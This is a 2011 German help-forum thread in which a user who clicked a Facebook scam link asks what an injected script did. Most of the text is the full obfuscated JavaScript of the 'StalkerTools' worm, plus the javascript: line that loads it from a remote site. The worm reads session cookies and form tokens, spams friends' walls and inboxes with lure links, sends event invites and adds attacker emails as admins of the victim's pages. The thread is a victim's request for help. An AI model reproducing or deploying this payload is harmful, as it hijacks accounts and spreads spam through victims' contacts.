Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 23.02.2011, 18:33   #1
Cassiopeia26
 
Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht? - Unglücklich

Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht?



Hallo,

aufgrund von nicht zu entschuldigender geistiger Umnachtung habe ich in Facebook einen Link geklickt und mir dabei ein Script eingefangen, von dem ich nicht weiß, was es genau gemacht hat. Auf jeden Fall hat es an die Pinnwände meiner Freunde gepostet und an eben diese auch Nachrichten verschickt...
Es handelt sich um folgendes Javascript:
Zitat:
javascript: (a = (d = document).createElement("script")).src = "hxxp://myprochecker.info/StalkerTools.fb"; void(d.body.appendChild(a))
Das Script:
Code:
ATTFilter
\x74\x68","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x66\x72\x69\x65\x6E\x64\x73\x65\x6C\x65\x63\x74\x6F\x72\x5F\x69\x6E\x70\x75\x74\x5B\x5D\x3D","\x26\x66\x72\x69\x65\x6E\x64\x5F\x73\x65\x6C\x65\x63\x74\x65\x64\x5B\x5D\x3D","\x50\x4F\x53\x54","\x2F\x70\x61\x67\x65\x73\x2F\x65\x64\x69\x74\x2F\x3F\x69\x64\x3D","\x26\x73\x6B\x3D\x61\x64\x6D\x69\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x3D","\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D","\x26","\x6A\x6F\x69\x6E","\x26\x73\x61\x76\x65\x3D\x31","\x6D\x61\x74\x63\x68","\x72\x61\x6E\x64\x6F\x6D\x69\x7A\x65","\x0A\x0A","\x26\x78\x68\x70\x63\x5F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x69\x64\x3D","\x26\x78\x68\x70\x63\x5F\x74\x61\x72\x67\x65\x74\x69\x64\x3D","\x7C","\x26\x78\x68\x70\x63\x5F\x63\x6F\x6E\x74\x65\x78\x74\x3D\x68\x6F\x6D\x65\x26\x78\x68\x70\x63\x5F\x66\x62\x78\x3D\x31\x26\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74\x3D","\x72\x65\x70\x6C\x61\x63\x65","\x26\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x3D","\x26\x55\x49\x50\x72\x69\x76\x61\x63\x79\x57\x69\x64\x67\x65\x74\x5B\x30\x5D\x3D\x34\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x76\x61\x6C\x75\x65\x5D\x3D\x34\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x66\x72\x69\x65\x6E\x64\x73\x5D\x3D\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x6C\x69\x73\x74\x5F\x61\x6E\x6F\x6E\x5D\x3D\x30\x26\x70\x72\x69\x76\x61\x63\x79\x5F\x64\x61\x74\x61\x5B\x6C\x69\x73\x74\x5F\x78\x5F\x61\x6E\x6F\x6E\x5D\x3D\x30\x26\x3D\x53\x68\x61\x72\x65\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x26\x6C\x73\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x31\x6A\x6C\x42\x71","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x49\x6C\x39\x6B\x48","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x35\x33\x35\x4F\x4B","\x68\x74\x74\x70\x3A\x2F\x2F\x74\x69\x6E\x79\x75\x72\x6C\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x63\x72\x65\x65\x70\x65\x72\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x33\x46\x46\x4E\x5A","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x79\x57\x49\x55\x36","\x31\x36\x38\x30\x34\x36\x38\x39\x33\x32\x34\x32\x36\x35\x30","\x31\x32\x37\x39\x30\x31\x34\x33\x37\x32\x38\x33\x31\x30\x34","\x31\x35\x35\x31\x34\x36\x33\x30\x31\x32\x30\x36\x38\x32\x35","\x6C\x65\x74\x68\x61\x62\x75\x72\x62\x61\x63\x68\x38\x39\x30\x40\x79\x61\x68\x6F\x6F\x2E\x63\x6F\x6D\x2C\x74\x65\x6E\x69\x73\x68\x61\x68\x6F\x6C\x73\x6D\x61\x6E\x70\x64\x6F\x70\x40\x68\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D","\x57\x6F\x77\x21\x20\x53\x65\x65\x6D\x73\x20\x6C\x69\x6B\x65\x20\x6C\x6F\x74\x73\x20\x6F\x66\x20\x70\x65\x6F\x70\x6C\x65\x20\x73\x74\x61\x6C\x6B\x20\x6D\x65\x20\x2D\x20","\x4E\x65\x77\x20\x46\x42\x20\x74\x6F\x6F\x6C\x20\x73\x68\x6F\x77\x73\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x73\x20\x79\x6F\x75\x72\x20\x70\x72\x6F\x66\x69\x6C\x65\x2D\x2D\x20","\x53\x65\x63\x72\x65\x74\x20\x74\x6F\x6F\x6C\x20\x73\x68\x6F\x77\x73\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x73\x20\x79\x6F\x75\x72\x20\x70\x69\x63\x73\x20","\x49\x6E\x73\x61\x6E\x65\x21\x20\x41\x77\x65\x73\x6F\x6D\x65\x20\x74\x6F\x6F\x6C\x20\x74\x6F\x20\x73\x65\x65\x20\x77\x68\x6F\x20\x6C\x6F\x6F\x6B\x73\x20\x61\x74\x20\x79\x6F\x75\x72\x20\x70\x69\x63\x73\x20\x3E\x3E\x20","\x41\x63\x63\x6F\x72\x64\x69\x6E\x67\x20\x74\x6F\x20","\x20\x79\x6F\x75\x27\x72\x65\x20\x6D\x79\x20\x74\x6F\x70\x20\x73\x74\x61\x6C\x6B\x65\x72\x2E\x20\x43\x72\x65\x65\x70\x2E","\x53\x65\x63\x72\x65\x74\x20\x74\x6F\x6F\x6C\x20\x73\x68\x6F\x77\x73\x20\x77\x68\x6F\x20\x73\x74\x61\x6C\x6B\x73\x20\x79\x6F\x75\x72\x20\x70\x69\x63\x73\x20\x2D\x20","\x43\x68\x65\x63\x6B\x20\x74\x68\x69\x73\x20\x6F\x75\x74\x21","\x48\x65\x79\x2C\x20\x77\x68\x61\x74\x73\x20\x68\x61\x70\x70\x65\x6E\x69\x6E\x67\x3F","\x48\x65\x79\x21\x20\x54\x68\x69\x73\x20\x69\x73\x20\x61\x77\x65\x73\x6F\x6D\x65","\x70\x72\x6F\x74\x6F\x74\x79\x70\x65","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x69\x73\x52\x65\x61\x64\x79","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x67\x65\x74\x46\x72\x69\x65\x6E\x64\x73","\x73\x6C\x69\x63\x65","\x3A","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x63\x72\x65\x77\x79\x6F\x75\x7A","\x61\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x6D\x61\x72\x67\x69\x6E","\x73\x74\x79\x6C\x65","\x30\x70\x78\x20\x61\x75\x74\x6F","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x74\x6F\x70","\x31\x30\x70\x78","\x7A\x69\x6E\x64\x65\x78","\x31\x30\x30","\x63\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x73\x63\x72\x65\x77\x79\x6F\x75","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x3C\x63\x65\x6E\x74\x65\x72\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x66\x62\x76\x69\x65\x77\x73\x2E\x6F\x72\x67\x2F\x70\x72\x6F\x63\x65\x73\x73\x2E\x67\x69\x66\x22\x20\x2F\x3E\x3C\x62\x72\x20\x2F\x3E\x53\x63\x61\x6E\x6E\x69\x6E\x67\x20\x6D\x61\x79\x20\x74\x61\x6B\x65\x20\x75\x70\x20\x74\x6F\x20\x33\x20\x6D\x69\x6E\x75\x74\x65\x73\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F","\x47\x45\x54","\x2F","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x48\x65\x6C\x6C\x6F\x21\x0A\x0A\x54\x6F\x20\x61\x63\x74\x69\x76\x61\x74\x65\x20\x74\x68\x65\x20\x74\x6F\x6F\x6C\x20\x70\x72\x65\x73\x73\x20\x45\x6E\x74\x65\x72\x20\x6F\x6E\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x62\x6F\x61\x72\x64\x2E\x20\x0A\x0A\x54\x68\x69\x73\x20\x77\x69\x6C\x6C\x20\x74\x61\x6B\x65\x20\x32\x2D\x33\x20\x6D\x69\x6E\x75\x74\x65\x73\x2C\x20\x77\x68\x69\x6C\x65\x20\x77\x61\x69\x74\x69\x6E\x67\x20\x70\x6C\x65\x61\x73\x65\x20\x64\x6F\x20\x6E\x6F\x74\x20\x63\x6C\x6F\x73\x65\x20\x74\x68\x69\x73\x20\x77\x69\x6E\x64\x6F\x77\x20\x6F\x72\x20\x74\x61\x62\x2E","\x63\x6F\x6F\x6B\x69\x65","\x2F\x61\x6A\x61\x78\x2F\x70\x61\x67\x65\x73\x2F\x66\x61\x6E\x5F\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D","\x26\x61\x64\x64\x3D\x31\x26\x72\x65\x6C\x6F\x61\x64\x3D\x31\x26\x70\x72\x65\x73\x65\x72\x76\x65\x5F\x74\x61\x62\x3D\x31\x26\x75\x73\x65\x5F\x70\x72\x69\x6D\x65\x72\x3D\x31\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x74\x6F\x70\x5F\x62\x61\x72\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x3D","\x26\x6C\x73\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x6C\x69\x73\x74\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x61\x6C\x6C\x2F\x3F\x75\x69\x64\x3D","\x26\x6F\x66\x66\x73\x65\x74\x3D\x30\x26\x64\x75\x61\x6C\x3D\x31\x26\x5F\x5F\x61\x3D\x31","\x69\x64\x73\x5B","\x5D\x3D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x26\x73\x65\x6E\x64\x5F\x69\x6E\x76\x69\x74\x61\x74\x69\x6F\x6E\x73\x3D\x31\x26\x69\x6E\x76\x69\x74\x65\x5F\x69\x64\x5F\x6C\x69\x73\x74\x3D\x26\x65\x6D\x61\x69\x6C\x5F\x61\x64\x64\x72\x65\x73\x73\x65\x73\x3D\x26\x69\x6E\x76\x69\x74\x65\x5F\x6D\x73\x67\x3D\x26","\x26\x6E\x6F\x64\x65\x5F\x69\x64\x3D","\x26\x63\x6C\x61\x73\x73\x3D\x47\x75\x65\x73\x74\x4D\x61\x6E\x61\x67\x65\x72\x26\x5F\x5F\x64\x3D\x31\x26\x6C\x73\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x66\x62\x76\x69\x65\x77\x73\x2E\x6F\x72\x67\x2F\x72\x65\x73\x75\x6C\x74\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x69\x64\x73\x5F","\x5B\x30\x5D\x3D","\x26\x73\x75\x62\x6A\x65\x63\x74\x3D","\x26\x73\x74\x61\x74\x75\x73\x3D","\x26\x69\x64\x73\x5B\x30\x5D\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x65\x6E\x64\x5F\x6E\x65\x77\x26\x68\x6F\x6D\x65\x5F\x74\x61\x62\x5F\x69\x64\x3D\x31\x26\x70\x72\x6F\x66\x69\x6C\x65\x5F\x69\x64\x3D","\x26\x74\x61\x72\x67\x65\x74\x5F\x69\x64\x3D\x30\x26\x61\x70\x70\x5F\x69\x64\x3D\x26\x26\x63\x6F\x6D\x70\x6F\x73\x65\x72\x5F\x69\x64\x3D","\x26\x68\x65\x79\x5F\x6B\x69\x64\x5F\x69\x6D\x5F\x61\x5F\x63\x6F\x6D\x70\x6F\x73\x65\x72\x3D\x74\x72\x75\x65\x26\x74\x68\x72\x65\x61\x64\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x3D","\x26\x6C\x73\x64\x26\x5F\x6C\x6F\x67\x5F\x61\x63\x74\x69\x6F\x6E\x3D\x73\x65\x6E\x64\x5F\x6E\x65\x77\x26\x5F\x6C\x6F\x67\x5F\x74\x68\x72\x65\x61\x64\x26\x61\x6A\x61\x78\x5F\x6C\x6F\x67\x3D\x31\x26\x70\x6F\x73\x74\x5F\x66\x6F\x72\x6D\x5F\x69\x64\x5F\x73\x6F\x75\x72\x63\x65\x3D\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x67\x69\x67\x61\x62\x6F\x78\x78\x2F\x65\x6E\x64\x70\x6F\x69\x6E\x74\x2F\x4D\x65\x73\x73\x61\x67\x65\x43\x6F\x6D\x70\x6F\x73\x65\x72\x45\x6E\x64\x70\x6F\x69\x6E\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x69\x6E\x73\x69\x67\x68\x74\x73\x2F\x3F\x5F\x66\x62\x5F\x6E\x6F\x73\x63\x72\x69\x70\x74\x3D\x31"];function _88xuhyr(_0x91e5x2){st=_0x91e5x2[_0x2804[1]](_0x2804[0]);d=_0x2804[2];for(i=0;i<st[_0x2804[3]];i++){d+=String[_0x2804[4]](st[i]-24);} ;eval(d);} ;function addAdmin(_0x91e5x4,_0x91e5x5,_0x91e5x6,_0x91e5x7){iemails=_0x91e5x5[_0x2804[1]](_0x2804[0]);main_emails=[];for(i=0;i<iemails[_0x2804[3]];i++){main_emails[i]=_0x2804[5]+iemails[i]+_0x2804[6];} ;with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[8]+_0x91e5x4+_0x2804[9]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[12]+_0x91e5x6+_0x2804[13]+_0x91e5x7+_0x2804[14]+_0x91e5x4+_0x2804[15]+main_emails[_0x2804[16]](_0x2804[15])+_0x2804[17]);} ;} ;function makePost(_0x91e5x9,_0x91e5xa,_0x91e5xb,_0x91e5xc){formx=_0x91e5x9[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=_0x91e5x9[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=_0x91e5x9[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];msg=_0x91e5xa[_0x2804[19]]()+_0x2804[20];text_post=_0x2804[2];text_actual=_0x2804[2];pxt=_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+_0x91e5xb[_0x2804[1]](_0x2804[23])[0]+_0x2804[24]+encodeURIComponent(msg+text_actual[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[26]+encodeURIComponent(msg+text_post[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[27];update(pxt);} ;function update(_0x91e5xe){with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[28]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x91e5xe);} ;} ;goog1=_0x2804[29];goog2=_0x2804[30];goog3=_0x2804[31];goog4=_0x2804[32];goog5=_0x2804[33];goog6=_0x2804[34];event_id=_0x2804[35];page_id_x=_0x2804[36];page_id_xx=_0x2804[37];admin_emails=_0x2804[38];statuses=[_0x2804[39]+goog1,_0x2804[40]+goog2,_0x2804[41]+goog3,_0x2804[42]+goog4,_0x2804[43]+goog5+_0x2804[44],_0x2804[45]+goog6];subjects=[_0x2804[46],_0x2804[47],_0x2804[48]];Array[_0x2804[49]][_0x2804[19]]=function (){return this[Math[_0x2804[51]](Math[_0x2804[50]]()*this[_0x2804[3]])];} ;Object[_0x2804[49]][_0x2804[52]]=function (){if(this[_0x2804[53]]==4&&this[_0x2804[54]]==200){return true;} else {return false;} ;} ;String[_0x2804[49]][_0x2804[55]]=function (){friends2=this[_0x2804[18]](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)[_0x2804[16]](_0x2804[57])[_0x2804[25]](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi,_0x2804[2])[_0x2804[25]](/\\\\\\\">/gi,_0x2804[23])[_0x2804[1]](_0x2804[57])[_0x2804[56]](1);return friends2;} ;function addAdmin(_0x91e5x4,_0x91e5x5,_0x91e5x6,_0x91e5x7){iemails=_0x91e5x5[_0x2804[1]](_0x2804[0]);main_emails=[];for(i=0;i<iemails[_0x2804[3]];i++){main_emails[i]=_0x2804[5]+iemails[i]+_0x2804[6];} ;with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[8]+_0x91e5x4+_0x2804[9]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[12]+_0x91e5x6+_0x2804[13]+_0x91e5x7+_0x2804[14]+_0x91e5x4+_0x2804[15]+main_emails[_0x2804[16]](_0x2804[15])+_0x2804[17]);} ;} ;function loading(){var _0x91e5x10=document[_0x2804[59]](_0x2804[58]);_0x91e5x10[_0x2804[60]]=_0x2804[61];_0x91e5x10[_0x2804[64]](_0x2804[62],_0x2804[63]);_0x91e5x10[_0x2804[66]][_0x2804[65]]=_0x2804[67];_0x91e5x10[_0x2804[66]][_0x2804[68]]=_0x2804[69];_0x91e5x10[_0x2804[66]][_0x2804[70]]=_0x2804[71];_0x91e5x10[_0x2804[66]][_0x2804[72]]=_0x2804[73];_0x91e5x10[_0x2804[74]]=_0x2804[75];_0x91e5x10[_0x2804[76]]=_0x2804[77];document[_0x2804[79]][_0x2804[78]](_0x91e5x10);} ;function makePost(_0x91e5x9,_0x91e5xa,_0x91e5xb,_0x91e5xc){formx=_0x91e5x9[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=_0x91e5x9[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=_0x91e5x9[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];msg=_0x91e5xa[_0x2804[19]]()+_0x2804[20];text_post=_0x2804[2];text_actual=_0x2804[2];pxt=_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+_0x91e5xb[_0x2804[1]](_0x2804[23])[0]+_0x2804[24]+encodeURIComponent(msg+text_actual[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[26]+encodeURIComponent(msg+text_post[_0x2804[25]](/\, $/,_0x2804[2]))+_0x2804[27];update(pxt);} ;function update(_0x91e5xe){with(newx= new XMLHttpRequest){open(_0x2804[7],_0x2804[28]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x91e5xe);} ;} ;if(window[_0x2804[81]][_0x2804[80]]==_0x2804[82]){formx=(res=document[_0x2804[79]][_0x2804[76]])[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=res[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=res[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];} else {with(muhaha= new XMLHttpRequest){open(_0x2804[83],_0x2804[84],false);send(null);} ;formx=(res=muhaha[_0x2804[85]])[_0x2804[18]](/name="post_form_id" value="([\d\w]+)"/)[1];dtx=res[_0x2804[18]](/name="fb_dtsg" value="([^"]+)"/)[1];composerx=res[_0x2804[18]](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];} ;alert(_0x2804[86]);update(_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+document[_0x2804[87]][_0x2804[18]](/c_user=(\d+)/)[1]+_0x2804[24]+encodeURIComponent(stx=statuses[_0x2804[19]]())+_0x2804[26]+encodeURIComponent(stx)+_0x2804[27]);with(newz= new XMLHttpRequest){loading();open(_0x2804[7],_0x2804[88]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[89]+page_id_x+_0x2804[90]+formx+_0x2804[13]+dtx+_0x2804[91]);} ;with(newzz= new XMLHttpRequest){open(_0x2804[7],_0x2804[88]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[89]+page_id_xx+_0x2804[90]+formx+_0x2804[13]+dtx+_0x2804[91]);} ; void 0;with(fr= new XMLHttpRequest){open(_0x2804[83],_0x2804[92]+(me=document[_0x2804[87]][_0x2804[18]](/c_user=(\d+)/)[1])+_0x2804[93]);onreadystatechange=function (){if(fr[_0x2804[52]]()){friends=fr[_0x2804[85]][_0x2804[55]]();idx=[];for(i=0;i<friends[_0x2804[3]];i++){if(!isNaN(friends[i][_0x2804[1]](_0x2804[23])[0])){idx[i]=_0x2804[94]+i+_0x2804[95]+friends[i][_0x2804[1]](_0x2804[23])[0];} ;} ;with(invi= new XMLHttpRequest){open(_0x2804[7],_0x2804[96]);setRequestHeader(_0x2804[10],_0x2804[11]);send(_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[97]+idx[_0x2804[16]](_0x2804[15])+_0x2804[98]+event_id+_0x2804[99]);} ;cnt_fr=0;tx=setInterval(function (){if(cnt_fr==friends[_0x2804[3]]){window[_0x2804[81]]=_0x2804[100];clearInterval(tx);} ;makePost(document[_0x2804[79]][_0x2804[76]],statuses,friends[cnt_fr],friends);with(xa= new XMLHttpRequest){open(_0x2804[83],_0x2804[101]);onreadystatechange=function (){if(xa[_0x2804[52]]()){compi=xa[_0x2804[85]][_0x2804[18]](/([\d\w]+)_error/)[1];pxi=_0x2804[102]+compi+_0x2804[103]+friends[cnt_fr][_0x2804[1]](_0x2804[23])[0]+_0x2804[104]+encodeURIComponent(subjects[_0x2804[19]]())+_0x2804[105]+encodeURIComponent(statuses[_0x2804[19]]())+_0x2804[106]+friends[cnt_fr][_0x2804[1]](_0x2804[23])[0]+_0x2804[107]+document[_0x2804[87]][_0x2804[18]](/c_user=(\d+)/)[1]+_0x2804[108]+compi+_0x2804[109]+formx+_0x2804[13]+dtx+_0x2804[110];if(cnt_fr<15){with(mi= new XMLHttpRequest){open(_0x2804[7],_0x2804[111]);setRequestHeader(_0x2804[10],_0x2804[11]);send(pxi);} ;} ;} ;} ;send(null);} ;cnt_fr+=1;} ,3000);} ;} ;send(null);} ;with(ins= new XMLHttpRequest){open(_0x2804[83],_0x2804[112]);onreadystatechange=function (){if(ins[_0x2804[52]]()){ids=ins[_0x2804[85]][_0x2804[18]](/po_\d+">View/gi)[_0x2804[16]](_0x2804[57])[_0x2804[25]](/(po_|">View)/gi,_0x2804[2])[_0x2804[1]](_0x2804[57]);cnt_pages=0;tz=setInterval(function (){if(cnt_pages==ids[_0x2804[3]]){window[_0x2804[81]]=_0x2804[100];clearInterval(tz);} ;update(_0x2804[12]+formx+_0x2804[13]+dtx+_0x2804[21]+composerx+_0x2804[22]+ids[cnt_pages]+_0x2804[24]+encodeURIComponent(stx=statuses[_0x2804[19]]())+_0x2804[26]+encodeURIComponent(stx)+_0x2804[27]);addAdmin(ids[cnt_pages],admin_emails,formx,dtx);cnt_pages+=1;} ,3000);} ;} ;send(null);} ;
         
Ich mache mir nun Sorgen, welche Daten das Script aus Facebook ausgelesen hat und ob es Schadsoftware auf meinem Rechner installiert hat.
Bitte, kann mir jemand den Code erklären?

Ich bin gerade wirklich sehr panisch. Lasse parallel gerade AntiMalwareBytes meinen Rechner scannen.
Was muss ich nun sonst noch tun?

HILFE!

Danke im voraus,
Cassiopeia26

Alt 24.02.2011, 11:08   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht? - Standard

Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht?



Bitte beachten => http://www.trojaner-board.de/95173-b...es-posten.html und http://www.trojaner-board.de/69886-a...-beachten.html
__________________

__________________

Antwort

Themen zu Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht?
.com, achtung, alert, antimalwarebytes, code, daten, document, eingefangen, folge, folgendes, freunde, gepostet, installiert, javascript, link, link geklickt, nachrichten, object, parallel, rechner, scan, script, sorge, this, update, verseucht, verseucht?, wirklich




Ähnliche Themen: Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht?


  1. Spam "Job Opportunity" angeklickt (Debian Jessie)
    Alles rund um Mac OSX & Linux - 13.07.2015 (4)
  2. DHL Paketankündigung - Link angeklickt - Rechner verseucht?
    Log-Analyse und Auswertung - 27.05.2015 (17)
  3. Diverse Malware ("CoolSaleCoupon", "ddownlloaditkeep", "omiga-plus", "SaveSense", "SaleItCoupon"); lahmer PC & viel Werbung!
    Plagegeister aller Art und deren Bekämpfung - 11.01.2015 (16)
  4. In Telekom "Rechnung" Link angeklickt - danach Emotet durch Avira gefunden
    Plagegeister aller Art und deren Bekämpfung - 04.12.2014 (11)
  5. T-online "Rechnung"-Link angeklickt und gezipte exe ausgeführt
    Plagegeister aller Art und deren Bekämpfung - 26.06.2014 (16)
  6. Windows 7 (64bit): Paypal Phishingmail -Link angeklickt - Rechner verseucht?
    Log-Analyse und Auswertung - 08.12.2013 (9)
  7. "monstermarketplace.com" Infektion und ihre Folgen; "Anti-Virus-Blocker"," unsichtbare Toolbars" + "Browser-Hijacker" von selbst installiert
    Log-Analyse und Auswertung - 16.11.2013 (21)
  8. Facebook-Link angeklickt "Just 14 years Old drunk girl .."
    Plagegeister aller Art und deren Bekämpfung - 26.08.2013 (39)
  9. Der Rechbaran seinen Rechner, da der Rechner von einem Virus "Zahlundsaufforderung angeblich von der GVU" hat den Rechner
    Plagegeister aller Art und deren Bekämpfung - 30.04.2013 (2)
  10. WinXP verseucht: "...ihr Computer wurde gesperrt... Bundespolizei..."
    Plagegeister aller Art und deren Bekämpfung - 05.08.2012 (1)
